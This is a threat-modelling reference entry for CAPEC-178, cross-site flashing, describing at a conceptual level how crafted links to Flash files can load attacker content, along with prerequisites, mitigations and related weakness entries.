CAPEC-178 Metadata
Likelihood of Attack
Medium
Typical Severity
Medium
Overview
Summary
An attacker is able to trick the victim into executing a Flash document that passes commands or calls to a Flash player browser plugin, allowing the attacker to exploit native Flash functionality in the client browser. This attack pattern occurs where an attacker can provide a crafted link to a Flash document (SWF file) which, when followed, will cause additional malicious instructions to be executed. The attacker does not need to serve or control the Flash document. The attack takes advantage of the fact that Flash files can reference external URLs. If variables that serve as URLs that the Flash application references can be controlled through parameters, then by creating a link that includes values for those parameters, an attacker can cause arbitrary content to be referenced and possibly executed by the targeted Flash application.
Prerequisites
The targeted Flash application must reference external URLs and the locations thus referenced must be controllable through parameters. The Flash application must fail to sanitize such parameters against malicious manipulation. The victim must follow a crafted link created by the attacker.
Execution Flow
| Step | Phase | Description | Techniques |
|---|---|---|---|
| 1 | Explore | [Identification] Using a browser or an automated tool, an attacker records all instances of URLs (or partial URL such as domain) passed to a flash file (SWF). |
|
| 2 | Experiment | [Attempt to inject a remote flash file] The attacker makes use of a remotely available flash file (SWF) that generates a uniquely identifiable output when executed inside the targeted flash file. |
|
| 3 | Exploit | [Access or Modify Flash Application Variables] As the attacker succeeds in exploiting the vulnerability, they target the content of the flash application to steal variable content, password, etc. |
|
| 4 | Exploit | [Execute JavaScript in victim's browser] When the attacker targets the current flash application, they can choose to inject JavaScript in the client's DOM and therefore execute cross-site scripting attack. |
|
Potential Solutions / Mitigations
Implementation: Only allow known URL to be included as remote flash movies in a flash application Configuration: Properly configure the crossdomain.xml file to only include the known domains that should host remote flash movies.
Related Weaknesses (CWE)
| CWE ID | Description |
|---|---|
| CWE-601 | URL Redirection to Untrusted Site ('Open Redirect') |
Related CAPECs
| CAPEC ID | Description |
|---|---|
| CAPEC-182 | An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker. |
Stay Ahead of Attack Patterns
Understanding CAPEC patterns helps security professionals anticipate and thwart potential attacks. Leverage these insights to enhance threat modeling, strengthen your software development lifecycle, and train your security teams effectively.